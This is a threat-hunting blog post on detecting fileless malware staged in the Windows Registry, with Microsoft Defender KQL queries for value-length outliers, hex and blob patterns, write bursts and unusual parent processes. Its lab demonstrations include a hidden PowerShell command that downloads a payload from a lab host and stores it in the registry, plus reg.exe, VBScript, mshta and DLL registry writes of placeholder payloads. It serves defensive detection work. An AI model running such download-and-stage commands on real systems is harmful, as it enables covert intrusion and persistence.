This post will cover methodology for hunting fileless malware techniques that leverage the Windows Registry for staging payloads and persistence. The analytics presented are for Microsoft Defender for Endpoint (MDE) using KQL.
Introduction
Registry-resident malware refers to a subset of fileless techniques where adversaries utilize the Window Registry to store payloads and establish persistence — all without writing traditional files to disk. LOLBins are a core component of fileless tradecraft, providing adversaries with native, trusted functionality to interact with the Windows Registry. This makes them particularly valuable in defense evasion scenarios, where minimizing artifacts is vital to remaining undetected. Likewise, it is important to recognize that “fileless” very rarely means fully devoid of files or artifacts. Many fileless techniques often leave behind forensic artifacts that provide evidence of specific actions on the endpoint.
In this post, we will focus on detecting anomalous registry entries containing encoded data and other staged payloads used during post-compromise activity. Given that the Windows Registry accommodates hundreds of thousands of legitimate key-value pairs, identifying malicious activity requires a well-defined scope and precise hunt analytics. Therefore, we will incorporate statistical outlier detection and behavioral correlation analytics to hunt for registry-based anomalies indicative of fileless threats.
Classifying LOLBins in Fileless Registry Operations
Let us start with a high-level overview of LOLBins in the context of registry-based operations, as they will be the focus of our hunt analytics. First, there is an important distinction between LOLBins that directly modify the registry and those that provide context for such modifications. That is, LOLBins that directly interact with the registry can modify keys or values themselves, whereas LOLBins which provide context are typically higher up on the process tree and may have been used to spawn a LOLBin capable of registry modification.
For instance, in a simple fileless attack scenario, cmd.exe is not used to modify the registry directly, but can be used to spawn reg.exe to perform the actual registry modification:
Cmd.exe serves as a contextual process during the registry modification by reg.exe.In a more complex scenario, we can use a WMI permanent event subscription to achieve the same functionality:
WmiPrvSE.exe and Cmd.exe serve as a contextual processes during the registry modification by reg.exe.Understanding these distinctions is crucial when building hunt analytics that target registry write operations. Accurate detection depends not only on identifying the process responsible for the immediate registry modification but also on tracking its process tree to attribute behavior properly, especially in more complex attacks.
LOLBins for Direct Registry Interaction
LOLBins capable of directly modifying the registry are particularly valuable for threat hunting, as their behavior can be linked to specific registry write operations. These registry operations are attributable to the executing process, irrespective of how the process is launched (e.g., command line parameters, process tree). The most common LOLBins used for direct registry interaction include powershell.exe (and its variants), reg.exe, wscript.exe, cscript.exe, and mshta.exe.
The following examples will demonstrate how each of these LOLBins interacts with the registry within a fileless attack context. The examples include a summary of how the process can modify the registry, an attack scenario, and command execution artifacts. While the commands shown are deliberately simple, they are designed to validate that the registry can in fact be modified by these processes — a behavior that underpins more complex, stealth-driven fileless attacks. This will help establish a solid foundation for understanding how we can later use hunt analytics to identify and attribute anomalous registry modifications with greater precision.
Powershell.exe
PowerShell can perform direct registry interaction using a range of built-in cmdlets, including: Get-ItemProperty, Set-ItemProperty, New-ItemProperty, Remove-ItemProperty, Clear-ItemProperty, Rename-ItemProperty, as well as their counterparts for working with registry keys directly: Get-Item, Set-Item, New-Item, Remove-Item, and Rename-Item. These cmdlets allow attackers to create, modify, or remove registry keys and values without dropping files to disk. In fileless attacks, PowerShell may be used to stage encoded or encrypted payloads in user-writable keys, modify Run keys for persistence, and execute registry-resident payloads via Invoke-Expression, Add-Type, or reflection-based techniques.
Scenario: powershell.exe retrieves a remote payload and writes it to the registry during a multi-stage attack.
Process Execution Artifacts:
powershell -NoProfile -WindowStyle Hidden -Command “$url = 'http://192.168.1.186/payload '; $payload = Invoke-WebRequest -Uri $url -UseBasicParsing; New-Item -Path ‘HKCU:\Software\TestKey’ -Force | Out-Null; Set-ItemProperty -Path ‘HKCU:\Software\TestKey’ -Name ‘RemotePSPayload’ -Value $payload.Content”
ProcMon, Registry Editor, and ProcDOT output of PowerShell command execution.Note: If powershell.exe loads a payload (DLL) directly into memory, and that payload performs any registry modifications, powershell.exe will still be recorded as the process responsible for those changes, since the payload executes within its memory context.
Reg.exe
Reg.exe is a native command-line utility used for direct interaction with the Windows Registry. Common commands for registry interaction include: reg add, reg query, reg delete, reg import, and reg export. Other LOLBins often invoke reg.exe to manipulate registry keys.
Scenario: cmd.exe spawns reg.exe, which writes a PowerShell command to the registry. The command may later be executed via scheduled task, WMI permanent event subscription, or other LOLBins.
Process Execution Artifacts:
reg add HKCU\Software\TestKey /v Payload /t REG_SZ /d “powershell.exe -NoProfile -WindowStyle Hidden -Command "$blob = ‘VGhpcyBpcyBhIGZha2UgcGF5bG9hZCB1c2VkIGluIGZpbGVzZXNzIGF0dGFja3MgdG8gc3RhZ2UgY29kZSBmb3IgZXhlY3V0aW9u’; New-Item -Path ‘HKCU:\Software\TestKey’ -Force ^| Out-Null; New-ItemProperty -Path ‘HKCU:\Software\TestKey’ -Name ‘Payload’ -Value $blob -PropertyType String -Force ^| Out-Null"” /f
ProcMon, Registry Editor, and ProcDOT output of reg.exe execution.Wscript.exe/Cscript.exe
Direct registry interaction via VBScript or JScript executed by wscript.exe/cscript.exe typically involves the use of the WScript.Shell ActiveX object’s methods for registry modification, including .RegRead(), .RegWrite(), and .RegDelete(). Additionally, these scripting hosts may leverage WMI classes within scripts to interact with the registry.
Scenario: cmd.exe spawns wscript.exe which writes a payload to the registry by executing a .vbs file.
Process Execution Artifacts:
'VBScript to write Base64-encoded payload to the registry
Set WshShell = CreateObject(“WScript.Shell”)
encodedPayload = “VGhpcyBpcyBhIGZha2UgcGF5bG9hZCB1c2VkIGluIGZpbGVsZXNzIGF0dGFja3MgdG8gc3RhZ2UgY29kZSBmb3IgZXhlY3V0aW9u”
WshShell.RegWrite “HKCU\Software\TestKey\Payload”, encodedPayload, “REG_SZ”
ProcMon, Registry Editor, and ProcDOT output of wscript.exe execution.Note: wscript.exe/cscript.exe cannot run inline code, thus a script file will need to temporarily touch disk for this technique. Generally, PowerShell is preferred for modern attacks, but wscript.exe/cscript.exe may be better suited for legacy environments, or those with heavy PowerShell restrictions.
Mshta.exe
Direct registry interaction via VBScript/JScript code execution. This can be accomplished via command line or by launching .hta (HTML Application) files. Mshta.exe can also retrieve remote .hta payloads over HTTP/HTTPS, making it attractive for fileless, web-based attacks that modify the registry.
Scenario: mshta.exe retrieves and executes a remote .hta file containing JScript to write a payload to the registry.
Process Execution Artifacts:
<html>
<!–Remote payload contents hosted on lab HTTP server (192.168.1.186) –>
<head>
<script language=“javascript”>
var shell = new ActiveXObject(“WScript.Shell”);
shell.RegWrite(“HKCU\Software\TestKey\RemoteHTAPayload”, “VGhpcyBpcyBhIGZha2UgcGF5bG9hZCB1c2VkIGluIGZpbGVsZXNzIGF0dGFja3MgdG8gc3RhZ2UgY29kZSBmb3IgZXhlY3V0aW9u”, “REG_SZ”);
window.close();
</script>
</head>
<body></body>
</html>
ProcMon, Registry Editor, and ProcDOT output of mshta.exe execution.Note: While the HTML script tag language may be labeled as JavaScript, it is interpreted by the JScript engine within mshta.exe.
Advanced LOLBins for Direct Registry Interaction
Several other LOLBins are capable of directly modifying the registry, though they often require prerequisite steps — such as writing a temporary file to disk — which makes them less strictly “fileless”. These LOLBins may not fully adhere to the concept of a fileless attack, but it is important to note that not all stages of a fileless attack need to be entirely fileless. Moreover, by “advanced,” we are referring to the extra steps involved, rather than complexity. Although the registry modification itself may be considered indirect, it can still be traced back to the process using tools like ProcMon. For the purposes of this post, we will focus on rundll32.exe. However, several other LOLBins exhibit similar behavior and can be used to facilitate registry modifications. These include MSBuild.exe, InstallUtil.exe, Regsvr32.exe, regini.exe, and Msiexec.exe, to name a few.
Rundll32.exe
Direct registry interaction can be achieved by executing DLLs that export functions which invoke Windows API calls such as RegSetValueEx, RegCreateKeyEx, and related functions to modify the registry. Rundll32.exe is commonly used to execute these DLL exports, either inline or from external DLL files. Also, rundll32.exe can be abused to load mshtml.dll and execute inline JavaScript, which in turn accesses the registry using ActiveXObject(“WScript.Shell”). However, since Internet Explorer is deprecated and disabled in modern environments, this mshtml-based technique has limited effectiveness.
Scenario: rundll32.exe executes a previously downloaded DLL, which upon execution, writes a second-stage payload into the registry. This payload may serve as a launcher, implant configuration, or a persistence mechanism for future execution.
Process Execution Artifacts:
//Test.dll source code
#include <windows.h>
#include <winreg.h>
extern “C” _declspec(dllexport) void RegWritePayload(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
HKEY hKey;
LPCSTR subKey = “Software\TestKey”;
LPCSTR valueName = “DllPayload”;
LPCSTR data = “VGhpcyBpcyBhIGZha2UgcGF5bG9hZCB1c2VkIGluIGZpbGVsZXNzIGF0dGFja3MgdG8gc3RhZ2UgY29kZSBmb3IgZXhlY3V0aW9u”;
//Create or open the key
if (RegCreateKeyExA(HKEY_CURRENT_USER, subKey, 0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL) == ERROR_SUCCESS) {
RegSetValueExA(hKey, valueName, 0, REG_SZ, (const BYTE*)data, strlen(data) + 1);
RegCloseKey(hKey);
}
}
ProcMon, Registry Editor, and ProcDOT output of rundll32.exe executing a custom dll.Note: Most registry-resident malware that targets persistence or payload staging leverages user-writable keys under HKCU, since they do not require elevated privileges, persist across reboots, and blend easily with legitimate user-level configurations.
MDE Analytics
With registry interaction techniques established, we now turn to analytics for detecting and hunting them in practice. This section introduces a range of detection strategies — including statistical baselining, behavioral correlation, structural pattern matching, and execution context analysis — to identify registry-resident malware. The goal is to provide multiple perspectives for identifying anomalous behavior, forming a robust, multi-layered approach to registry threat hunting. The analytics in the section include:
- Registry write length outlier detection (mean + standard deviation)
- Hex/shellcode-like pattern detection
- Blob detection (long strings without spaces)
- Registry write bursts by LOLBins
- Registry modification via indirect parent processes
- Registry writes to uncommon HKCU paths by LOLBins
LOLBin Writes Suspicious Registry Value Length
This analytic uses a statistical approach grounded in standard deviation to detect outliers in registry write operations associated with a given LOLBin. The methodology expands on detection techniques discussed in a previous post. It begins by calculating the average length and standard deviation of RegistryValueData written by the chosen process within a defined time window. Using these values, the query establishes thresholds (1, 2, and 3 standard deviations above the mean) to highlight outliers that may represent encoded payloads or suspicious configuration data. By focusing on registry write length anomalies rather than character content, this method enables the detection of obfuscated or fileless techniques that evade traditional signature-based detection. The thresholds serve as a guide for prioritizing review and pivoting into deeper investigation.
//LOLBin Writes Suspicious Registry Value Length
//This analytic detects registry write operation anomalies based on source process and stdev thresholds
let window = 1d;
let reg_lolbin = dynamic([“reg.exe”]); //Additional LOLBins of interest: powershell.exe, pwsh.exe, powershell_ise.exe, wscript.exe, cscript.exe, mshta.exe, rundll32.exe, reg.exe, etc.
//Step 1: Calculate average and standard deviation of registry value lengths by process
let calc_avg_stdev = (DeviceRegistryEvents
| where Timestamp > ago(window)
//Add environment-specific filters here, such as service accounts, benign processes, scripts, etc.
| where InitiatingProcessFileName in~(reg_lolbin)
| where ActionType == “RegistryValueSet”
| where RegistryKey has @“HKEY_CURRENT_USER” //Most registry-resident malware that targets persistence or payload staging leverages user-writable keys under HKCU, since they do not require elevated privileges, persist across reboots, and blend easily with legitimate user-level configurations. Edit as needed.
| extend reg_length = strlen(RegistryValueData)
| where reg_length > 0 //filter empty values to prevent skewing before calculating avg/stdev
| summarize avg_reg_length = avg(reg_length), stdev_reg_length = stdev(reg_length) by InitiatingProcessFileName
| extend STDEV_1 = avg_reg_length + stdev_reg_length,
STDEV_2 = avg_reg_length + (2 * stdev_reg_length),
STDEV_3 = avg_reg_length + (3 * stdev_reg_length)
);
//Step 2: Detect suspicious registry writes by comparing to statistical thresholds
DeviceRegistryEvents
| where Timestamp > ago(window)
//Add environment-specific filters here, such as service accounts, benign processes, scripts, etc.
| where InitiatingProcessFileName in~(reg_lolbin)
| where ActionType == “RegistryValueSet”
| where RegistryKey has @“HKEY_CURRENT_USER” //Most registry-resident malware that targets persistence or payload staging leverages user-writable keys under HKCU, since they do not require elevated privileges, persist across reboots, and blend easily with legitimate user-level configurations. Edit as needed.
| extend reg_length = strlen(RegistryValueData)
| where reg_length > 0 //filter empty values
| summarize count() by reg_length, InitiatingProcessFileName, RegistryValueData
| join kind=leftouter (calc_avg_stdev) on InitiatingProcessFileName
| extend STDEV_Calc = case(
reg_length >= STDEV_3, “3 standard deviations above mean”,
reg_length >= STDEV_2, “2 standard deviations above mean”,
reg_length >= STDEV_1, “1 standard deviation above mean”,
reg_length >= avg_reg_length, “Value between mean and one standard deviation”,
“Value below mean”)
| project InitiatingProcessFileName, reg_length, STDEV_Calc, RegistryValueData, avg_regwrite_length = avg_reg_length, stdev_regwrite_length = stdev_reg_length, STDEV_1, STDEV_2, STDEV_3
| order by reg_length asc //order by registry length from least suspicious to most suspicious
Suspicious Hex-encoded Values in Registry Key
This analytic searches for registry write operations performed by common LOLBins within the time window that contain long hexadecimal strings in user-writable registry keys (HKCU). Since shellcode and other payloads are often encoded as hex bytes when staged in the registry, detecting values matching this pattern can identify potential fileless attack activity. While the presence of hex-encoded data alone does not guarantee malicious activity, it provides a strong heuristic to identify suspicious registry writes that warrant further analysis.
//Suspicious Hex-encoded Values in Registry Key
let window = 30d;
let reg_lolbin = dynamic([“powershell.exe”, “pwsh.exe”, “powershell_ise.exe”, “reg.exe”, “wscript.exe”, “cscript.exe”, “mshta.exe”, “rundll32.exe”]);
let hex_pattern = @“\b(0x)?[A-Fa-f0-9]{15,}\b”; //Match on any string of 15 hexadecimal characters or more, edit as needed
DeviceRegistryEvents
| where Timestamp > ago(window)
| where ActionType == “RegistryValueSet”
| where RegistryKey has “HKEY_CURRENT_USER” //Most registry-resident malware that targets persistence or payload staging leverages user-writable keys under HKCU, since they do not require elevated privileges, persist across reboots, and blend easily with legitimate user-level configurations. Edit as needed.
| where InitiatingProcessFileName in~(reg_lolbin)
| where isnotempty(RegistryValueData)
| extend reg_length = strlen(RegistryValueData)
| where RegistryValueData matches regex hex_pattern
| project InitiatingProcessFileName, RegistryValueData, RegistryKey, reg_length
| order by reg_length asc
Suspicious Blob Value in Registry Key
This analytic serves as a generic catch-all for detecting suspicious registry write activity involving large, space-less blobs of data — often indicative of encoded payloads, shellcode, or configuration blocks. By focusing on entries written by known LOLBins under HCKU that exceed a configurable length threshold and lack spacing, this query highlights potential fileless techniques designed to evade standard detection. While some benign software may write large values, this analytic is effective in identifying anomalies for deeper triage.
//Suspicious Blob Value in Registry Key
let window = 30d;
let reg_lolbin = dynamic([“powershell.exe”, “pwsh.exe”, “powershell_ise.exe”, “reg.exe”, “wscript.exe”, “cscript.exe”, “mshta.exe”, “rundll32.exe”]);
| where Timestamp > ago(window)
| where ActionType == “RegistryValueSet”
| where RegistryKey has “HKEY_CURRENT_USER” //Most registry-resident malware that targets persistence or payload staging leverages user-writable keys under HKCU, since they do not require elevated privileges, persist across reboots, and blend easily with legitimate user-level configurations. Edit as needed.
| where InitiatingProcessFileName in~(reg_lolbin)
| where isnotempty(RegistryValueData)
| extend reg_length = strlen(RegistryValueData)
| where reg_length > 100 //Adjust length threshold as needed
| where not(RegistryValueData contains " ") //Ensures data is a blob with no spaces
| project InitiatingProcessFileName, RegistryValueData, RegistryKey, reg_length
| order by InitiatingProcessFileName asc, reg_length asc
Registry Modification via Indirect Execution
This analytic focuses on identifying fileless registry attacks where LOLBins with direct registry modification capabilities are spawned by indirect or non-standard parent processes. These include background mechanisms such as scheduled tasks (schtasks.exe, taskhostw.exe), WMI-based execution (WmiPrvSE.exe), service-related processes (svchost.exe, services.exe), and COM surrogate execution (dllhost.exe). Such execution chains often operate outside normal user interaction, making them effective for fileless persistence or staged payload delivery.
//Registry Modification via Indirect Execution
let window = 30d;
let reg_lolbin = dynamic([“powershell.exe”, “pwsh.exe”, “powershell_ise.exe”, “reg.exe”, “wscript.exe”, “cscript.exe”, “mshta.exe”, “rundll32.exe”]);
let indirect_lolbin = dynamic([“WmiPrvSE.exe”, “svchost.exe”, “schtasks.exe”, “taskhostw.exe”, “services.exe”, “dllhost.exe”]);
DeviceRegistryEvents
| where Timestamp > ago(window)
| where ActionType == “RegistryValueSet”
| where RegistryKey has “HKEY_CURRENT_USER” //Most registry-resident malware that targets persistence or payload staging leverages user-writable keys under HKCU, since they do not require elevated privileges, persist across reboots, and blend easily with legitimate user-level configurations. Edit as needed.
| where InitiatingProcessParentFileName in~ (indirect_lolbin)
| where InitiatingProcessFileName in~ (reg_lolbin)
| extend reg_length = strlen(RegistryValueData)
| where reg_length > 0
| summarize count() by DeviceName, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine, RegistryValueData
LOLBin Registry Write Bursts
This analytic identifies short-lived bursts of registry write activity originating from known LOLBins. By grouping RegistryValueSet events into fixed 1-minute windows, it detects when a LOLBin rapidly modifies multiple registry keys within a short time frame—often indicative of scripting activity, configuration staging, or multi-key payload delivery. This approach does not rely on content-based signatures, making it effective for identifying generic high-volume behaviors regardless of the payload format. The make_set() aggregation function surfaces the specific registry keys and value names written during the burst, enabling faster triage and threat context. By tuning the burst window and write threshold, defenders can adapt this analytic to balance fidelity and noise across environments. This is especially valuable for uncovering obfuscated or automated behaviors that may blend into normal registry activity when viewed outside a temporal context.
//LOLBin Registry Write Bursts
let window = 30d;
let reg_burst_window = 1m; //Burst duration
let reg_write_threshold = 5; //Minimum number of registry writes to qualify as a burst
let reg_lolbin = dynamic([“powershell.exe”, “pwsh.exe”, “powershell_ise.exe”, “reg.exe”, “wscript.exe”, “cscript.exe”, “mshta.exe”, “rundll32.exe”]);
DeviceRegistryEvents
| where Timestamp > ago(window)
| where ActionType == “RegistryValueSet”
| where RegistryKey has “HKEY_CURRENT_USER” //Most registry-resident malware that targets persistence or payload staging leverages user-writable keys under HKCU, since they do not require elevated privileges, persist across reboots, and blend easily with legitimate user-level configurations. Edit as needed.
| where InitiatingProcessFileName in~(reg_lolbin)
| extend burst_window = bin(Timestamp, reg_burst_window)
| summarize reg_write_count = count(), burst_start_time = min(Timestamp), burst_end_time = max(Timestamp), reg_key_list = make_set(RegistryKey, 10), reg_key_values_list = make_set(RegistryValueName, 10)
by burst_window, DeviceName, InitiatingProcessFileName
| where reg_write_count >= reg_write_threshold
| order by reg_write_count asc
LOLBins Writes to Uncommon HKCU Key
This analytic identifies potentially suspicious registry write activity by LOLBins that target uncommon or unusual registry keys under HKEY_CURRENT_USER. To improve accuracy and reduce noise from per-user variations, it normalizes user SIDs within registry key paths by replacing them with a placeholder. The analytic first establishes a baseline of commonly written normalized registry keys over a specified time window. It then detects registry writes by LOLBin processes to normalized keys outside this common baseline, helping highlight anomalous or rare registry modifications that could indicate malicious behavior. This approach effectively filters out benign variations caused by unique user profiles and focuses attention on truly unusual registry activity.
//LOLBins Writes to Uncommon HKCU Key
let window = 30d;
let reg_lolbin = dynamic([“powershell.exe”, “pwsh.exe”, “powershell_ise.exe”, “reg.exe”, “wscript.exe”, “cscript.exe”, “mshta.exe”, “rundll32.exe”]);
//Function to normalize user SIDs in registry key paths (replace SIDs with placeholder)
let NormalizeSid = (key:string) {
replace_regex(key, @“S-1-5-[0-9-]+(?:-[0-9]+)*”, “<SID>”)
};
//Step 1: Identify common normalized HKCU keys
let common_keys = (
DeviceRegistryEvents
| where Timestamp > ago(window)
| where ActionType == “RegistryValueSet”
| where RegistryKey has “HKEY_CURRENT_USER”
| extend NormalizedKey = NormalizeSid(RegistryKey)
| summarize count() by NormalizedKey
| top 100 by count
| project NormalizedKey
);
//Step 2: Find writes by LOLBins to uncommon normalized keys
DeviceRegistryEvents
| where Timestamp > ago(window)
| where ActionType == “RegistryValueSet”
| where RegistryKey has “HKEY_CURRENT_USER”
| where isnotempty(RegistryValueData)
//Add environment-specific filters here, such as common software install-related reg keys, etc.
| where InitiatingProcessFileName in~(reg_lolbin)
| extend NormalizedKey = NormalizeSid(RegistryKey) //From all registry writes by LOLBins to HKCU keys, exclude any registry key paths that appear in the list of common registry keys used frequently across the environment
| join kind=leftanti (
common_keys
) on NormalizedKey
| extend reg_length = strlen(RegistryValueData)
| project InitiatingProcessFileName, NormalizedKey, reg_length, RegistryValueData
| order by InitiatingProcessFileName asc, reg_length asc
Note: While registry-based persistence via Run keys is a well-known technique, it is not the focus of this blog post. These paths are already well-covered by built-in detections within MDE, including alerts for suspicious registry persistence and known LOLBin behavior. Instead, this hunt focuses on more evasive fileless tradecraft—such as encoded payloads, registry blobs, and non-standard registry modifications—where traditional signatures may fall short.
Summary
In conclusion, this post examined how adversaries leverage LOLBins to interact with the Windows Registry as part of fileless malware techniques. We discussed the distinction between LOLBins that directly modify the registry and those that contribute indirect execution context. To detect these behaviors, we introduced a set of complementary hunting strategies — ranging from statistical baselining and behavioral correlation to structural pattern matching and execution chain analysis. Collectively, these techniques help identify anomalous registry activity that may evade traditional detection methods or become obscured by excessive telemetry.
References
https://www.crowdstrike.com/en-us/cybersecurity-101/malware/fileless-malware/
https://redcanary.com/threat-detection-report/techniques/modify-registry/
Hunting Fileless Malware in the Windows Registry was originally published in Detect FYI on Medium, where people are continuing the conversation by highlighting and responding to this story.
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
Article Link: Hunting Fileless Malware in the Windows Registry | by Manuel Arrieta | Jun, 2025 | Detect FYI